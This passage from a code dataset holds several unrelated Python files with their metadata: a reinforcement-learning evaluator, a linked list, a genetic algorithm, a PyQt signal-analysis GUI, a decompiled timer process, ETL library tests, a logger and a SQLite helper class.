av_reward = np.zeros(numiters)\n \n env.reset() # reset environment\n for t in range(numiters-1):\n action = policy(*args)\n state, reward, demand, info = env.step(action)\n cum_reward[t+1] = cum_reward[t] + reward\n av_reward[t+1] = cum_reward[t+1] / (t+1)\n \n plt.plot(range(numiters), av_reward)\n plt.xlabel('time step')\n plt.ylabel('average reward')\n \n print('Average reward: ' + str(av_reward[-1]))\n\ndef evaluate(env, n_episodes, numiters, policy, *args):\n # env: gym environment\n # n_episodes: number of total episodes to run (outer iteration)\n # numiters: number of time steps (inner iteration)\n # policy: policy function\n # *args: arguments in the policy function\n env.seed(0)\n av_reward = np.zeros(n_episodes)\n \n for i in range(n_episodes):\n av_r = 0\n env.reset() # reset environment\n for t in range(numiters):\n action = policy(*args)\n state, reward, demand, info = env.step(action)\n if t > 100 and np.abs( av_r / (t+1) - (av_r + reward) / (t+2)) < 1e-4: # convergence is spotted\n break\n av_r = av_r + reward\n av_reward[i] = av_r / (t+1)\n \n return np.mean(av_reward), np.std(av_reward) # return average reward and std","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"620525269","text":"\nclass Node(object):\n def __init__(self, data):\n self.data = data\n self.next = None\n\n def get_data(self):\n return self.data\n\n def get_next(self):\n return self.next\n \n def set_data(self, data):\n self.data = data\n\n def set_next(self, next):\n self.next = next\n\n def __str__(self):\n return str(self.data)\n\nclass LinkedList(object):\n def __init__(self, head=None):\n self.head = head\n self.length = 0\n\n def get_length(self):\n return self.length\n\n def insert(self,data,index=0):\n if (index < 0) or (index > self.length):\n return\n insert_node = Node(data)\n if (index == 0):\n if (self.head is None):\n self.head = insert_node\n else:\n insert_node.set_next(self.head)\n self.head = insert_node\n else:\n node = self.head\n for _ in range(index - 1):\n node = node.get_next()\n insert_node.set_next(node.get_next())\n node.set_next(insert_node)\n self.length += 1\n\n def find(self, data):\n node = self.head\n index = 0\n while (node is not None):\n if (node.data == data): return index\n index += 1\n node = node.get_next()\n\n def delete(self, index=0):\n if (index < 0) or (index > self.length - 1):\n return\n elif (index == 0):\n self.head = self.head.next\n return\n node = self.head\n if (node is None):\n return\n for _ in range(index - 1):\n node = node.get_next()\n node.next = node.get_next().get_next()\n self.length -= 1\n\n def __str__(self):\n if self.head is None: return \"This list is empty.\"\n else:\n node = self.head\n ret_list = \"[\"\n while (True):\n ret_list += str(node.data)\n if (node.next is None):\n ret_list += \"]\"\n return ret_list\n else:\n ret_list += \", \"\n node = node.get_next()","sub_path":"linked_lists/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"456326297","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 20 16:12:47 2020\n\n@author: mosda\n\"\"\"\nimport random\nimport itertools\nfrom datetime import datetime\n\nclass Individual:\n def __init__(self, size):\n self.size = size\n self.board = []\n self.set_board()\n\n\n def get_size(self):\n return self.size\n\n def set_board(self):\n self.board = []\n for x in range(self.size):\n self.board.append([])\n\n def get_board(self):\n return self.board\n\n def add_to_board(self, individual):\n for i in range(len(self.board)):\n if len(self.board[i]) == 0:\n self.board[i] = individual\n break\n return self.board\n\n def place(self, individual, pos):\n '''\n Place the individual on the board\n :param individual:\n :param pos:\n :return:\n '''\n self.board[pos] = individual\n\n def individual(self):\n '''\n Get a random individual\n :return: a list of random numbers in the range 0, size - 1\n '''\n # random.seed(int(datetime.now().strftime('%M:%S.%f')[-3:]))\n\n perm1 = random.sample(range(1, self.size + 1), self.size)\n perm2 = random.sample(range(1, self.size + 1), self.size)\n return [perm1, perm2]\n\n def get_all(self, individual):\n '''\n Get all permutations except the given one\n :param individual:\n :return:\n '''\n return list(itertools.permutations(individual))\n\n def population(self, count):\n '''\n Get a population of count members\n :param count: how many individuals (permutations)\n :return: list of count individuals\n '''\n return [self.individual() for x in range(count)]\n\n def fitness(self, individual):\n '''\n If the pairs are repeating in the matrix, increase fitness by 1\n The lower the fitness, the better the candidate\n :param individual: the individual to check\n :param current: the current state of the board\n :return: fitness lvl\n '''\n fit = 0\n for x in range(len(self.board)):\n try:\n for a, b in zip(self.board[x][0], individual[0]):\n if a == b:\n fit += 1\n for c, d in zip(self.board[x][1], individual[1]):\n if c == d:\n fit += 1\n except IndexError:\n return fit\n return fit\n\n def crossover(self, parent1, parent2, crossover_prob):\n '''\n Order crossover (with 2 cuts)\n Place the sequence from parent1 between the cuts in position\n Complete the new individual until the end with the rest of\n parent 2\n Complete the rest of the new individual with the numbers that\n are not already existing in the new individual\n :param parent1: individual to make the crossover\n :param parent2: individual to make the crossover\n :return: the new individual\n '''\n\n random.seed(int(datetime.now().strftime('%M:%S.%f')[-3:]))\n if crossover_prob > random.random():\n\n\n pos1 = random.randint(0, len(parent1[0]))\n pos2 = random.randint(pos1, len(parent1[0]))\n\n if pos1 == pos2:\n return parent2\n else:\n new_born1 = self.result_crossover(parent1[0], parent2[0], pos1, pos2)\n new_born2 = self.result_crossover(parent1[1], parent2[1], pos1, pos2)\n return [new_born1, new_born2]\n\n else:\n return parent1\n\n def result_crossover(self, parent1, parent2, pos1, pos2):\n '''\n Crossover on one half of the given parents\n :param parent1:\n :param parent2:\n :param pos1:\n :param pos2:\n :return:\n '''\n subs1 = parent1[pos1:pos2]\n subs2 = parent2[pos1:pos2]\n end = parent2[pos2:]\n start = parent2[:pos1]\n aux = []\n\n for x in subs2:\n if x not in subs1:\n aux.append(x)\n\n subs2 = aux\n\n for y in end:\n if y in subs1:\n end[end.index(y)] = subs2.pop(0)\n\n for z in start:\n if z in subs1 and z not in end:\n start[start.index(z)] = subs2.pop(0)\n\n new_born = start + subs1 + end\n\n return new_born\n\n def mutate(self, individual, mutation_prob):\n '''\n Perform a mutation on the given individual\n :param individual: the individual to mutate\n :return: the new individual\n '''\n random.seed(int(datetime.now().strftime('%M:%S.%f')[-3:]))\n\n if mutation_prob > random.random():\n random.shuffle(individual[0])\n random.shuffle(individual[1])\n return individual\n\n\n # def __str__(self):\n # s = ''\n # for line in self.board:\n # for element in line:\n # s = s + str(element) + ' '\n # s = s + '\\n'\n # return s\n\n","sub_path":"2nd Year/AI/Lab3/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61814254","text":"# -*- coding: utf-8 -*-\n\n# PyQt5: pyuic5 -o View.py View.ui\n\n''' ***** 自定义包,类 ***** '''\nfrom View import *\nfrom Util.Message import Message\nfrom Model.Seg import SegFile,DataTtrack\nfrom MyController.MyFigureCanvas import *\nfrom MyController import Algorithm_CWT\n\n''' ==================== ↓ 控制 ↓ ==================== '''\nclass Controller(QtWidgets.QMainWindow):\n def __init__(self):\n super(Controller, self).__init__() # 先调用父类的构造函数\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.initUi() # 界面初始设置\n self.connect() # 绑定信号槽\n self.addPainteWidget() #添加绘图控件\n \n self.stateDiagram = 0 #程序状态控制 —— 用于切换不同界面控制:0.初始状态、1.已加载文件、2.已完成FFT、3.已完成CWT、4、已完成LSTM\n\n def initUi(self): # 界面初始设置\n self.setWindowState(QtCore.Qt.WindowMaximized)\n self.toolButton_Home_clicked()\n\n ''' ↓ 添加绘图控件 ↓ '''\n def addPainteWidget(self):\n\n self.paintFFT = MyFigureCanvasFFT(1)\n self.ui.gridLayout_Canvas_FFT.addWidget(self.paintFFT)\n \n self.paintCWT = MyFigureCanvasCWT(2)\n self.ui.gridLayout_Canvas_CWT_Paint.addWidget(self.paintCWT)\n\n self.paintLSTM = MyFigureCanvasLSTM(3)\n self.ui.gridLayout_Canvas_LSTM.addWidget(self.paintLSTM)\n\n \n def connect(self): # 绑定信号槽\n # 绑定导航栏按钮\n self.ui.toolButton_Home.clicked.connect(self.toolButton_Home_clicked)\n self.ui.toolButton_FFT.clicked.connect(self.toolButton_FFT_clicked)\n self.ui.toolButton_CWT.clicked.connect(self.toolButton_CWT_clicked)\n self.ui.toolButton_LSTM.clicked.connect(self.toolButton_LSTM_clicked)\n self.ui.toolButton_Set.clicked.connect(self.toolButton_Set_clicked)\n\n # 绑定meanBar\n self.ui.opeanFile.triggered.connect(self.menu_opeanFile)\n\n ''' -------------------- ↓ 菜单栏事件 ↓ -------------------- '''\n\n def menu_opeanFile(self):\n fileName, filetype = QtWidgets.QFileDialog.getOpenFileName(\n self, \"选取文件\", \"C:/\", \"seg Files (*.seg)\") # 设置文件扩展名过滤,注意用双分号间隔\n\n if fileName == '' :\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Error(1002)'], QtWidgets.QMessageBox.Yes)\n else:\n self.segFile = SegFile()\n \n reply = self.segFile.loadFile(fileName)\n if(reply != 0):\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict[reply], QtWidgets.QMessageBox.Yes)\n else:\n self.stateDiagram = 1 # 1-已加载文件\n \n self.paintCWT.figureClear()\n for i in range(0,self.segFile.tapeNum):\n self.paintFFT.setAx(i,self.segFile.tapeNum,'2d')\n self.paintFFT.paint(i,self.segFile.dataList[i].data)\n \n # cwtmatr,freqs = Algorithm.MyPywtCWT( self.segFile.dataList[ self.segFile.TapeNumCurrent ].data )\n # cwtmatr = Algorithm_CWT.MyScipyCwt(self.segFile.dataList[ self.segFile.TapeNumCurrent ].data, 128)\n cwtmatr = Algorithm_CWT.MyWavelets(self.segFile.dataList[ self.segFile.TapeNumCurrent ].data, 128)\n \n self.paintCWT.figureClear()\n\n # self.paintCWT.setAx(0,2) # 第 1 行, 共 2 行\n # self.paintCWT.MyMatshow(0,cwtmatr)\n\n self.paintCWT.setAx(0,1,'3d') # 第 2 行, 共 2 行\n self.paintCWT.MyPlot_surface(0, cwtmatr, 1, 2) # 第几行、数据、绘图采样步长:频率、绘图采样步长:时间\n self.paintCWT.My3DView_init(0,45,180)\n \n\n \n # 导航栏更新\n\n def toolButton_NavigationBar_Update(self, i):\n # 设置导航栏颜色\n p = QtGui.QPalette() # 调色板\n p.setColor(QtGui.QPalette.Button, QtGui.QColor(44, 44, 44)) # 灰黑色\n\n self.ui.toolButton_Home.setPalette(p)\n self.ui.toolButton_FFT.setPalette(p)\n self.ui.toolButton_CWT.setPalette(p)\n self.ui.toolButton_LSTM.setPalette(p)\n self.ui.toolButton_Set.setPalette(p)\n\n p.setColor(QtGui.QPalette.Button, QtGui.QColor(128, 128, 128)) # 灰色\n if i == 0:\n self.ui.toolButton_Home.setPalette(p)\n if i == 1:\n self.ui.toolButton_FFT.setPalette(p)\n if i == 2:\n self.ui.toolButton_CWT.setPalette(p)\n if i == 3:\n self.ui.toolButton_LSTM.setPalette(p)\n if i == 4:\n self.ui.toolButton_Set.setPalette(p)\n\n self.ui.stackedWidget_Panel.setCurrentIndex(i)\n self.ui.stackedWidget_Canvs.setCurrentIndex(i)\n\n def toolButton_Home_clicked(self):\n self.toolButton_NavigationBar_Update(0)\n\n def toolButton_FFT_clicked(self):\n if self.stateDiagram >=1: # 1-已加载文件\n self.toolButton_NavigationBar_Update(1)\n self.stateDiagram = 2\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1001)'], QtWidgets.QMessageBox.Yes)\n \n def toolButton_CWT_clicked(self):\n if self.stateDiagram >=2: # 2-已完成FFT\n self.toolButton_NavigationBar_Update(2)\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1002)'], QtWidgets.QMessageBox.Yes)\n \n def toolButton_LSTM_clicked(self):\n if self.stateDiagram >=3: # 3-已完成CWT\n self.toolButton_NavigationBar_Update(3)\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1003)'], QtWidgets.QMessageBox.Yes)\n \n def toolButton_Set_clicked(self):\n if self.stateDiagram >=1: # 1-已加载文件\n self.toolButton_NavigationBar_Update(4)\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1001)'], QtWidgets.QMessageBox.Yes)\n \n\n\n\n","sub_path":"v0.5.5-test/MyController/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"565011029","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /users/payno/.local/share/virtualenvs/tomwer_venc/lib/python3.7/site-packages/tomwer/core/process/timer.py\n# Compiled at: 2020-03-06 02:01:31\n# Size of source mod 2**32: 2556 bytes\n__authors__ = [\n 'H. Payno']\n__license__ = 'MIT'\n__date__ = '12/12/2018'\nfrom tomwer.core.process.baseprocess import SingleProcess, _input_desc, _output_desc\nfrom tomwer.core.scan.scanbase import TomoBase\nfrom tomwer.core.scan.scanfactory import ScanFactory\nimport time\nfrom tomwer.core.log import TomwerLogger\n_logger = TomwerLogger(__name__)\n\nclass Timer(SingleProcess):\n __doc__ = '\\n Simple timer / time out - function'\n inputs = [\n _input_desc(name='data', type=TomoBase, handler='process', doc='scan object')]\n outputs = [\n _output_desc(name='data', type=TomoBase, doc='scan object')]\n\n def __init__(self, wait):\n SingleProcess.__init__(self)\n self.waiting_time = wait or 1\n\n @property\n def waiting_time(self):\n return self._waiting_time\n\n @waiting_time.setter\n def waiting_time(self, wait):\n self._waiting_time = wait\n\n def process(self, scan):\n if type(scan) is dict:\n _scan = ScanFactory.create_scan_object_frm_dict(scan)\n else:\n _scan = scan\n assert isinstance(scan, TomoBase)\n time.sleep(self.waiting_time)\n if self._return_dict:\n return _scan.to_dict()\n return _scan","sub_path":"pycfiles/tomwer-0.4.0.linux-x86_64.tar/timer.cpython-37.py","file_name":"timer.cpython-37.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"227708762","text":"#Exponentation-Part A\r\n\r\n'''\r\nWrite a program to find the exponentation of given number\r\n\r\nInput 1: Number of terms \r\nInput 2: Base\r\n\r\nOutput:\r\nList of exponentation terms for the given input\r\n\r\nRefer sample input and output for formatting specification.\r\n'''\r\n\r\nn= int(input())\r\nb= int(input())\r\np = 0\r\nprint(\"The total terms is:\",n)\r\nfor i in range(0, n):\r\n p=pow(b,i)\r\n print(p)\r\r\n","sub_path":"Python/Exponentation-Part A.py","file_name":"Exponentation-Part A.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"541378563","text":"import pytest\nimport pandas as pd\nfrom pandas.testing import assert_frame_equal\nimport pypel\nimport os\nimport datetime as dt\nimport numpy\nfrom tests.unit.test_Loader import LoaderTest\n\n\nclass TransformerForTesting(pypel.transformers.Transformer):\n def _format_na(self, df: pd.DataFrame) -> pd.DataFrame:\n return df.where(df.notnull(), 0).astype(int)\n\n\n@pytest.fixture\ndef ep():\n return pypel.processes.Process(extractor=pypel.extractors.Extractor())\n\n\ndef mockreturn_extract(self, dummy):\n d = {\n \"PRoJET\": [\"nom du projet\"],\n \"ENTREPrISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE ENTREPRISE\": [\"PME\"],\n \"SIRéN\": [110020013],\n \"SIRéT\": [11002001300097],\n \"DéPARTEMENT\": [\"75\"],\n \"VILlE\": [\"Paris\"],\n \"MONTANT INVESTISSEMENT\": [10000],\n \"DESCRIPTION_PROJET\": [\"belle description de ce projet\"],\n \"RETOMBéES PROJET\": [\"belle retombées du projet\"],\n \"DATE_DEPOT_PROJET\": [dt.datetime.strptime(\"2019/05/12\", \"%Y/%m/%d\")],\n \"DATE_DEBUT_INSTRUCTION\": [dt.datetime.strptime(\"2019/05/12\", \"%Y/%m/%d\")],\n \"MONTANT_PARTICIPATION_ETAT\": [5000],\n \"DATE_DECISION\": [dt.datetime.strptime(\"2019/05/12\", \"%Y/%m/%d\")],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"STATUT\": [\"decidé\"]\n }\n df = pd.DataFrame(d)\n return df\n\n\ndef mockreturn_extract_no_date(self):\n test = {\n \"Projet\": [\"nom du projet\"],\n \"ENtReprISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE eNTReprISE\": [\"PME\"],\n \"SIreN\": [110020013],\n \"SIREt\": [11002001300097],\n \"Département\": [\" 75 \"],\n \"Ville\": [\"Paris\"],\n \"MonTANT INVESTISSEMENT\": [10000],\n \"DESCRIPTION pROJET\": [\"belle description de ce projet\"],\n \"RETOMBEES PROJET\": [\"belle retombées du projet\"],\n \"MONTANT PARTICIPATION éTAT\": [5000],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"Statut\": [\"decidé\"],\n \"ShouldBeNone\": numpy.NaN\n }\n test_df = pd.DataFrame(test)\n return test_df\n\n\ndef test_integration_extract_transform_no_date(ep, params, monkeypatch):\n monkeypatch.setattr(pypel.processes.Process, \"extract\", mockreturn_extract_no_date)\n expected = {\n \"PROJET\": [\"nom du projet\"],\n \"ENTREPRISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE_ENTREPRISE\": [\"PME\"],\n \"SIREN\": [110020013],\n \"SIRET\": [11002001300097],\n \"DEPARTEMENT\": [\"75\"],\n \"VILLE\": [\"Paris\"],\n \"MONTANT_INVESTISSEMENT\": [10000],\n \"DESCRIPTION_PROJET\": [\"belle description de ce projet\"],\n \"RETOMBEES_PROJET\": [\"belle retombées du projet\"],\n \"MONTANT_PARTICIPATION_ETAT\": [5000],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"STATUT\": [\"decidé\"],\n \"SHOULDBENONE\": None\n }\n df = ep.extract()\n with pytest.warns(UserWarning):\n obtained = ep.transform(df,\n column_replace={\"é\": \"e\", \" \": \"_\"},\n strip=[\"DEPARTEMENT\"])\n expected_df = pd.DataFrame(expected)\n assert_frame_equal(expected_df, obtained, check_names=True)\n\n\ndef test_integration_exctract_transform(ep, params, monkeypatch):\n monkeypatch.setattr(pypel.processes.Process, \"extract\", mockreturn_extract)\n expected = {\n \"PROJET\": [\"nom du projet\"],\n \"ENTREPRISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE_ENTREPRISE\": [\"PME\"],\n \"SIREN\": [110020013],\n \"SIRET\": [11002001300097],\n \"DEPARTEMENT\": [\"75\"],\n \"VILLE\": [\"Paris\"],\n \"MONTANT_INVESTISSEMENT\": [10000],\n \"DESCRIPTION_PROJET\": [\"belle description de ce projet\"],\n \"RETOMBEES_PROJET\": [\"belle retombées du projet\"],\n \"DATE_DEPOT_PROJET\": [\"2019-05-12\"],\n \"DATE_DEBUT_INSTRUCTION\": [\"2019-05-12\"],\n \"MONTANT_PARTICIPATION_ETAT\": [5000],\n \"DATE_DECISION\": [\"2019-05-12\"],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"STATUT\": [\"decidé\"]\n }\n df = ep.extract(\"\")\n obtained = ep.transform(df,\n column_replace={\"é\": \"e\", \" \": \"_\"},\n date_format=\"%Y-%m-%d\",\n date_columns=[\"DATE_DEPOT_PROJET\", \"DATE_DEBUT_INSTRUCTION\", \"DATE_DECISION\"])\n expected_df = pd.DataFrame(expected)\n assert_frame_equal(expected_df, obtained, check_names=True)\n\n\ndef test_init_dataframe_excel(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.xlsx\")\n expected_default = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n df = ep.extract(path)\n with pytest.warns(UserWarning):\n obtained_default = ep.transform(df)\n assert_frame_equal(expected_default, obtained_default)\n\n\ndef test_init_dataframe_excel_skiprows(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.xlsx\")\n expected_skip_5 = pd.DataFrame(data=[[6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]],\n columns=[\"0\", \"1\", \"2\", \"3\", \"4\"])\n df = ep.extract(path, skiprows=5, header=None)\n with pytest.warns(UserWarning):\n obtained_skip_5 = ep.transform(df)\n assert_frame_equal(expected_skip_5, obtained_skip_5)\n\n\ndef test_init_dataframe_excel_sheetname(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.xlsx\")\n expected_sheetname = pd.DataFrame(data=[[9]], columns=[\"A\"])\n df = ep.extract(path, sheet_name=\"TEST\")\n with pytest.warns(UserWarning):\n obtained_sheetname = ep.transform(df)\n assert_frame_equal(expected_sheetname, obtained_sheetname)\n\n\ndef test_init_dataframe_excel_csv(ep, params, monkeypatch):\n path_csv = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.csv\")\n expected_csv = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n df = ep.extract(path_csv)\n with pytest.warns(UserWarning):\n obtained_csv = ep.transform(df)\n assert_frame_equal(expected_csv, obtained_csv)\n\n\ndef test_init_bad_filename(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_bad_filename$.csv\")\n expected_badfilename = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n df = ep.extract(path)\n with pytest.warns(UserWarning):\n obtained_bad_filename = ep.transform(df)\n assert_frame_equal(expected_badfilename, obtained_bad_filename)\n\n\ndef test_init_bad_filename_excel(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_bad_filename$.xlsx\")\n expected_badfilename = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n with pytest.warns(UserWarning):\n df = ep.extract(path)\n with pytest.warns(UserWarning):\n obtained_bad_filename = ep.transform(df)\n assert_frame_equal(expected_badfilename, obtained_bad_filename)\n\n\ndef test_multiple_transformers(ep):\n testing_df = pd.DataFrame({\"0\": [numpy.NaN]})\n expected_df = pd.DataFrame({\"0\": [0]})\n with pytest.warns(UserWarning):\n obtained_df = pypel.processes.Process(\n transformer=[pypel.transformers.Transformer(), TransformerForTesting()]).transform(testing_df)\n assert_frame_equal(expected_df, obtained_df, check_names=True)\n\n\ndef test_process_method(es_conf, es_indice):\n path_csv = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.csv\")\n process = pypel.processes.Process(loader=LoaderTest(es_conf, es_indice))\n with pytest.warns(UserWarning):\n process.process(path_csv)\n","sub_path":"tests/integration/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":9769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570525555","text":"import time\nimport traceback\n\nclass LogLevel:\n Info = 'Info'\n Warning = 'Warning'\n Error = 'Error'\n Debug = 'Debug'\n\ndef writeException(customMessage, exception):\n print(customMessage, str(exception))\n\ndef write(message, logLevel=LogLevel.Info):\n msgFormat = time.strftime(\"%d/%m/%y\") + \" \" + time.strftime(\"%H:%M:%S\") + \" \"\n if logLevel == LogLevel.Info:\n msgFormat += \"{0}\"\n elif logLevel == LogLevel.Warning:\n msgFormat += \"WARNING: {0}\"\n elif logLevel == LogLevel.Error:\n msgFormat += \"\\n------------------------------------------------------------------------------------\"\n msgFormat += \"\\n ERROR: {0}\"\n msgFormat += \"\\n------------------------------------------------------------------------------------\"\n elif logLevel == LogLevel.Debug:\n msgFormat += \"DEBUG: {0}\"\n\n print(msgFormat.format(message));","sub_path":"Python/ComandoServer/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264990199","text":"import sqlite3,os,re,time\nfrom itertools import compress\nimport numpy as np\n\nclass DatabaseMaster:\n\n def __init__(self,db_path):\n \"\"\"\n Initialize database master\n\n :param db_path: path of the sqlite database file\n :return:\n None\n \"\"\"\n self.conn = sqlite3.connect(db_path)\n\n def merge(self,into_table,from_table,merge_cols,order):\n \"\"\"\n Merges any table into the output table\n\n Suggestion:\n When providing order, please, use `run_idx` for the argument table, and `out_idx` for the output table.\n Also, it the `arg_table` it is a good idea to select `run_idx ==1`\n\n Example:\n
\n        merge('out_000_dock','arg_000_reorder','reorder_outpath',[[1,4,2,3],[1,2,3,4]])\n        
\n\n :param into_table: string (table to merge into)\n :param from_table: string (table to merge from)\n :param merge_cols: list of strings (names of the columns in merge_from to merge)\n :param order: Two lists of the same length. into_table_idx <-- from_table_idx \\\n First list: idx of the `into_table`, second list: idx of the `from table` to merge.\n :return: \n None\n \"\"\"\n\n assert len(order)==2, \"order should contain 2 lists [[idx_to_update(into_table)],[idx_of_updates(from_table)]]\"\n cursor = self.conn.cursor()\n num_cols = len(merge_cols)\n\n # find the data types of the columns to transfer\n sql_cmd = \"pragma table_info(\\\"{}\\\")\".format(from_table)\n cursor.execute(\"{}\".format(sql_cmd))\n\n arg_infos = cursor.fetchall()\n arg_dict = {}\n [arg_dict.update({arg_info[1]:arg_info[2]}) for arg_info in arg_infos]\n col_types = [arg_dict[col_name] for col_name in merge_cols]\n\n # initialize the columns in the table where cols will be added\n sql_tmp = \"alter table \\\"{}\\\" add column \".format(into_table)\n for i in range(num_cols):\n sql_cmd = sql_tmp + \", \".join([\" \".join([merge_cols[i],col_types[i]])]) + \";\"\n cursor.execute(sql_cmd)\n self.conn.commit()\n\n # fetch values to transfer\n sql_cmd = \"select \" + \", \".join(merge_cols) + \" from \\\"{}\\\"\".format(from_table)\n cursor.execute(sql_cmd)\n transfer_vals = cursor.fetchall()\n\n # gather the transfer values from the downstream table with order\n transfer_vals = map(lambda i: transfer_vals[order[1][i]] + (order[0][i],), order[0])\n\n # insert columns into the upstream table\n sql_tmp = \"update \\\"{}\\\" set \".format(into_table)\n sql_tmp += \", \".join([merge_cols[i]+ \"=?\" for i in range(num_cols)])\n sql_tmp += \" where out_idx=?;\"\n self.conn.executemany(sql_tmp,transfer_vals)\n self.conn.commit()\n\n def list_search(self, search_with, search_in):\n \"\"\" Search with each element of the `search_with` in the list `search_in`.\n Then get three lists:\n - hits_idx:\n A list of length len(search_with) of lists. Internal list is indexes [j1,j2,j3,j4] such that values \\\n search_with[i] == search_in[j1], search_with[i] == search_in[j2], ...\n - hits_val:\n Same as hits_idx but lists with values instead of indexes\n - pairs_idx:\n Two lists of the same length. search_with[pairs_idx[0][i]] == search_in[pairs_idx[1][i]]\n\n Example:\n
\n        list_search(['3AT1','2TPI'],['2TPI','3EML','3AT1','2TPI'])\n        
\n\n Output:\n
\n        [[2],[0,3]],\n        [['3AT1'],['2PTI','2PTI']],\n        [[0,2],[1,0],[1,3]]\n        
\n\n :param search_with: list of [str/float/int]\n :param search_in: list of [str/float/int]\n :return:\n three lists: hits_idx, hits_val, pairs_idx\n \"\"\"\n sw = np.asarray(search_with)\n si = np.asarray(search_in)\n\n # sort search_in, count every element\n order_si = np.argsort(si)\n sorted_si = si[order_si]\n unique_si, counts_si = np.unique(sorted_si, return_counts=True)\n\n # search sorted\n hits_unq_idx = np.searchsorted(unique_si, sw)\n hits_mask = np.in1d(sw, unique_si)\n\n # loop through every query and add all of its examples to the answer list\n hits_idx = []\n hits_val = []\n pair_idx = [[], []]\n\n for i in range(len(sw)):\n if not hits_mask[i]:\n hits_idx.append([])\n hits_val.append([])\n else:\n # one matches many form of output\n hit_idx = [order_si[j + hits_unq_idx[i]] for j in range(counts_si[hits_unq_idx[i]])]\n hits_idx.append(hit_idx)\n q_hit_val = list(si[hit_idx])\n hits_val.append(q_hit_val)\n # one matches one form of output\n [[pair_idx[0].append(i), pair_idx[1].append(idx)] for idx in hit_idx]\n return hits_idx, hits_val, pair_idx\n\n\n def retrieve(self, table, cols, col_rules):\n \"\"\" Retrieves column values from a single table based on a given filtering rule.\n\n Example:\n
\n        my_db.retrieve(some_table_table,[\"num1\",\"num2\"],{\"remainder_div_3\":\"{}==1 or {}==2\", \"sum\":\"{}<200\"})\n        
\n will retrieve:\n
